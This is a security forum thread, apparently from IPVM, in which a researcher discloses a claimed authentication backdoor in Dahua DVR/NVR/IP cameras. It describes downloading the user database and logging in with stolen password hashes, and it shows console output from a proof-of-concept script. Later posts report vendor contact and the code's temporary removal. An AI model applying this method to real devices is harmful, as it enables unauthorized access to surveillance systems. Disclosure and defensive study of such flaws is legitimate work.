Subscriber Discussion
0-Day: Dahua Backdoor Generation 2 & 3
[IPVM Update: Researcher had shared code but has removed it temporarily and is communication with Dahua. More details inside discussion.]
[IPVM Update: full report and testing findings released of the Dahua backdoor here.]
[STX]
I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.
I have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all their clones.
Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)
In short:
You can delete/add/change name on the admin users, you change password on the admin users - this backdoor simply don't care about that!
It uses whatever names and passwords you configuring - by simply downloading the full user database and use your own credentials!
This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices
This is like a damn Hollywood hack, click on one button and you are in...
Below PoC you will find here: [REMOVED]
Please have understanding of the quick hack of the PoC, I'm sure it could be done better.
Have a nice day
/bashis
$ ./dahua-backdoor.py --rhost 192.168.5.2
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }
[>] Logging out
[<] 200 OK
[*] All done...
$
$ ./dahua-backdoor.py --rhost 192.168.5.3
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }
[>] Logging out
[<] 200 OK
[*] All done...
$
[ETX]
If you enjoyed 'Dahua Backdoor' by bashis, check out some of his other Greatests Hits...
[IPVM Note: bashis also discovered the Axis critical security vulnerability last year]

$ ./dahua-backdoor.py --rhost 192.168.5.2
This looks like it was targeting devices on the same subnet. Does it work the same from a remote IP?
Also what is Generation 2 and 3 referring to? A rev of hardware?
Perhaps we should start a thread about who OEMs Dahua...
UPDATE: Dahua is in communication with Bashis. Bashis has removed the code temproarily, noting:
I have received request from Dahua for temporally remove this code.
Code will be removed until 5 April, to give them 30 days to address the problem.
Sorry, bashis
Related, this indicates that Dahua is acknowledging that this is legitimate. We are in communication with Dahua to understand what specific models are impacted and when the fix is released.
So are we basically saying if the device is exposed to the internet, one could just upload their own log in?
I suppose if the device is behind a firewall or vpn this would not be possible?
Two updates:
Karas verified the script worked on a current Dahua IP camera.
I have notified as many Dahua OEMs as I personally know.
We expect more information Monday.
Update: we plan to publish our full report and test findings at 4pm today (03/06/17).
Update #2: see Dahua Backdoor Uncovered for full report
Newest Discussions
Discussion | Posts | Latest |
---|---|---|
Started by
Charles Rollet
|
2
|
about 1 hour by Charles Rollet |
Started by
Undisclosed Integrator #1
|
7
|
about 1 hour by Undisclosed Integrator #3 |
Started by
John Honovich
|
6
|
less than a minute by Undisclosed Manufacturer #3 |
Started by
John Honovich
|
4
|
about 1 hour by John Honovich |
Started by
Timothy Carter
|
2
|
less than a minute by Brian Rhodes |